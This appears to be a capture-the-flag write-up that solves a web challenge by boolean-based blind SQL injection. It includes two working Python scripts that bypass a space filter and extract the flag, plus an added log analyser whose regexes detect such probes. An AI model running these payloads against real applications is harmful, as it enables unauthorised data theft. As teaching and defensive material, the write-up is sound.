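This challenge gives away the table name and the column name right at the start, so all that is left is to query them.
Entering 1 returns:
Hello, glzjin wants a girlfriend.
Entering 2 returns:
Do you want to be my girlfriend?
While entering 0 returns:
Error Occured When Fetch Result.
This suggests boolean-based blind injection, using the if function to test whether a condition holds.
First query the length. Because spaces are filtered, parentheses have to be used in their place.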
import requests

url = "http://64b562ce-66ec-49db-9507-77e5cd05b9f2.node4.buuoj.cn:81/index.php"
length = 1
while True:
    # Spaces are filtered, so the subquery is written with parentheses only
    data = {"id": f"if(length((select(flag)from(flag)))={length},1,0)"}
    r = requests.post(url, data=data)
    # The id=1 message means the condition was true
    if 'Hello, glzjin wants a girlfriend.' in r.text:
        break
    print(length, end='\n')
    length += 1
print(f"flag长度为{length}")
Running it once gives a flag length of 42.
Then retrieve the flag (my skill level is low, so the code may not be written to standard).
import requests
import time

url = "http://d2eaa69a-ae3a-4ad5-a1ac-b65ebe1da1bf.node4.buuoj.cn:81/"
flag = ''
for x in range(1, 43):
    # Binary search over the printable ASCII range for character x
    left = 33
    right = 126
    while right > left:
        mid = (left + right + 1) // 2
        data = {'id': f"if(ascii(substr((select(flag)from(flag)),{x},1))>={mid},1,0)"}
        r = requests.post(url, data=data)
        if 'Hello, glzjin wants a girlfriend.' in r.text:
            left = mid
        else:
            right = mid - 1
        time.sleep(0.1)
    flag += chr(right)
    print(flag)
print(f"flag为{flag}")
That yields the flag.
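
How the two scripts above look from the server side, as an added example that is not part of the original write-up: legitimate `id` values are plain integers, so anything else can be rejected and logged, and repeated comparisons against one character position mark an extraction in progress. The log entries, client addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

VALID_ID = re.compile(r"\d{1,9}")  # the only shape a legitimate id takes
# Position and compared value in probes like ascii(substr((...),3,1))>=80
PROBE = re.compile(r"substr\(.+?,(\d+),1\)\)(>=|<=|=|>|<)(\d+)", re.I)

# Constructed sample (client, POST body) pairs; addresses are documentation ranges.
SAMPLE_LOG = [
    ("198.51.100.20", "id=1"),
    ("198.51.100.20", "id=2"),
    ("192.0.2.44", "id=abc"),
    ("203.0.113.7", "id=if(length((select(flag)from(flag)))=1,1,0)"),
    ("203.0.113.7", "id=if(length((select(flag)from(flag)))=2,1,0)"),
] + [
    ("203.0.113.7", f"id=if(ascii(substr((select(flag)from(flag)),1,1))>={mid},1,0)")
    for mid in (80, 103, 91, 97, 100, 101, 102)  # one binary search, as in the script
]


def analyse(log):
    """Count non-integer ids per client and record what each probe compared."""
    report = defaultdict(lambda: {"rejected": 0, "probes": defaultdict(list)})
    for client, body in log:
        value = parse_qs(body).get("id", [""])[0]
        if VALID_ID.fullmatch(value):
            continue  # integer id: normal traffic
        entry = report[client]
        entry["rejected"] += 1
        match = PROBE.search(value)
        if match:
            entry["probes"][int(match.group(1))].append(int(match.group(3)))
    return report


def extraction_suspects(report, min_probes=3):
    """Clients that tested one character position against several values."""
    return sorted(
        client for client, entry in report.items()
        if any(len(vals) >= min_probes for vals in entry["probes"].values())
    )


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for client in extraction_suspects(result):
        print(client, result[client]["rejected"], dict(result[client]["probes"]))
```

The same `VALID_ID` check applied before the query is built, together with binding `id` as a parameter, removes the true/false oracle that both scripts depend on; filtering spaces alone does not.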